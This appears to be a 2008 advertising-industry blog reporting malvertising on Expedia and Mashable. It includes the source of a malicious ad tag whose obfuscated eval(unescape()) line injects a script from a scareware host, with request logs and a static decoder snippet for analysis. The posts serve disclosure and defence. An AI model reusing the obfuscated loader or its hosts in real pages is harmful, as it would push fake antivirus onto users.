Malvertisement on Expedia.com
November 23rd, 2008
Kudos to Andrew Dilling who sent me the full logs of this last night. I don’t have a contact @ Expedia but if someone does please shoot them a note.
Screenshot:

The popup:

Antivirus 2009 Download Page:

Tamper Data:

Calls:
GET http://www.expedia.com/
GET http://www.prolinar.com/?id=200811181921042
GET http://vernariostar.com/?id=200811181921042
GET http://www.google-analytics.com/ga.js
GET http://www.google-analytics.com/__utm.gif?utmwv[...]
http://vernariostar.com/includes.js
POST http://clicksoverview.com/soft.php?aid=075675&d=1&product=XPA&refer=dc77b3921
GET http://antivirusdefense.com/2009/1/freescan.php?nu=77075675
Code of the Ad tag page:
<html><body style="margin:0; padding:0;">
<a href="http://www.rhapsody.com/?ref=26ta7" target="_blank"><img src="http://www.triesto.com/banners-db/Rhapsody/Rhapsody_728×90_1.jpg" border=0></a><script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script>
<script type="text/javascript">
var pageTracker = _gat._getTracker("UA-6195944-3");
pageTracker._trackPageview();
</script><script>
var action_URL = "http://clicksoverview.com/soft.php?aid=075675&d=1&product=XPA&refer=dc77b3921";
var target_URL = "http://clicksoverview.com/soft.php?aid=075675&d=1&product=XPA&refer=dc77b3921";
var warn_prod = "";
eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%76%65%72%6E%61%72%69%6F%73%74%61%72%2E%63%6F%6D%2F%69%6E%63%6C%75%64%65%73%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E%27%29%3B'));</script>
</body></html>
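The eval(unescape(...)) line in the tag above hides the script include that appears in the Calls list. As an added example (not part of the original post), this Node.js snippet decodes such layers statically, without evaluating anything, and lists the hosts of any script a decoded layer would write into the page. The function names are illustrative, and only unescape() calls with a single string-literal argument are handled.

```javascript
// Added example: peel eval(unescape('...')) layers from an ad tag statically.
// Nothing is evaluated; the payload is only decoded and inspected.

// The obfuscated line from the ad tag above, written with straight quotes.
const SAMPLE_TAG = "eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%76%65%72%6E%61%72%69%6F%73%74%61%72%2E%63%6F%6D%2F%69%6E%63%6C%75%64%65%73%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E%27%29%3B'));";

// Quote characters accepted around the argument: straight quotes plus the
// typographic ones that blog software substitutes in pasted samples.
const Q = "'\"\u2018\u2019\u201C\u201D";
const UNESCAPE_CALL = new RegExp(`unescape\\(\\s*[${Q}]([^${Q}]*)[${Q}]\\s*\\)`, "g");

// Decode %XX and %uXXXX in a single pass, as legacy unescape() does.
// Malformed sequences are left as-is rather than throwing.
function decodeEscapes(s) {
  return s.replace(/%u([0-9a-f]{4})|%([0-9a-f]{2})/gi,
    (_, u, h) => String.fromCharCode(parseInt(u || h, 16)));
}

// Decode every literal-argument unescape() call, then look inside the result
// for further calls, up to maxDepth layers.
function peelLayers(source, maxDepth = 5) {
  const layers = [];
  let pending = [source];
  for (let depth = 1; depth <= maxDepth && pending.length > 0; depth++) {
    const next = [];
    for (const text of pending) {
      for (const m of text.matchAll(UNESCAPE_CALL)) {
        const decoded = decodeEscapes(m[1]);
        layers.push({ depth, decoded });
        next.push(decoded);
      }
    }
    pending = next;
  }
  return layers;
}

// Hosts of any <script src=...> that a decoded layer would write into the page.
function injectedScriptHosts(source) {
  const hosts = new Set();
  for (const { decoded } of peelLayers(source)) {
    for (const m of decoded.matchAll(/<script\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)/gi)) {
      try { hosts.add(new URL(m[1]).hostname); } catch { /* relative or malformed */ }
    }
  }
  return [...hosts];
}

console.log(peelLayers(SAMPLE_TAG));
console.log(injectedScriptHosts(SAMPLE_TAG));
```

Comparing the returned hosts against the hosts the creative is expected to load from makes a hidden third-party include stand out before the tag is trafficked.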
Mashable/Google/Malvertising Follow-Up
August 20th, 2008
First off — the ad is still showing. If someone has a contact @ Mashable, it’d be good to send them a note.
Greg Yardley thinks that this ad is not served by the Adsense network but instead by Mashable’s internal salesforce and that they are simply using Google’s new AdManager product as their adserving solution. Digging through the tags, it’s unclear whether or not this is the case. The actual creative is hosted on the domain “pagead2.googlesyndication.com” which has traditionally been used to host Adsense creatives and ad tags. Google’s AdManager runs on a different domain — “partner.googleadservices.com” — but it is certainly possible that AdManager and AdSense share the same underlying static content delivery system. (someone from Google care to comment?)
This is an excellent example of the fact that URLs generally don’t provide enough information to identify who is delivering the actual advertisement on the page. In this Mashable/Google page, it is unclear — it could be Mashable’s internal salesforce selling the ad — or there could be some server-side integration between AdManager and Adsense and Adsense is responsible for serving this actual creative. Right Media suffered from many of the same problems — people would always yell at the Right Media Ad-Network whenever a creative hosted at content.yieldmanager.com was causing problems, even though that single domain was shared across 50+ networks.
The solution that we came up with @ RM was to start using DNS CNAME aliases when returning any and all content. A CNAME is a DNS record that says “this domain name is an alias for this other domain name”. So for example, the domain “content.cpxinteractive.com” is an alias for “content.yieldmanager.com”. This way, if CPX was responsible for serving a bad ad the offending URL would be “content.cpxinteractive.com/ad.jpg” and not “ad.yieldmanager.com/ad.jpg”. CNAMEs allow central serving systems (e.g., AdManager) to both hand out tags and return creative content tagged with an owner while still maintaining the same internal systems.
Google Adsense showing Malvertisements
August 19th, 2008
Matt Cannon sent this one over to me yesterday afternoon. He saw Google showing this lovely ad for MediaMan on mashable.com at about 1pm EST. MediaMan was identified a long time ago as a malvertisement, so it’s a surprise to see them popping up on the Adsense network. Details are below. Now I’m not posting this to shame Google (I’m sure their content team has already pulled this ad) — I’m posting this more as a call to action. It’s time that we start grouping together as an industry to help stop this. More thoughts coming on that shortly.
Screengrab of ad on Mashable:

Source of the ad (warning I would not open this if I were you):
http://pagead2.googlesyndication.com/pagead/imgad?id=CLK8lreVvKyciwEQ2AUYWjIIqyqX6hvFaHc
Screengrab of the ad:

And for the first time in a while (probably because I’m in Moscow!) I actually got the actual trigger, and got this nice popup:

and was redirected to this lovely landing page:






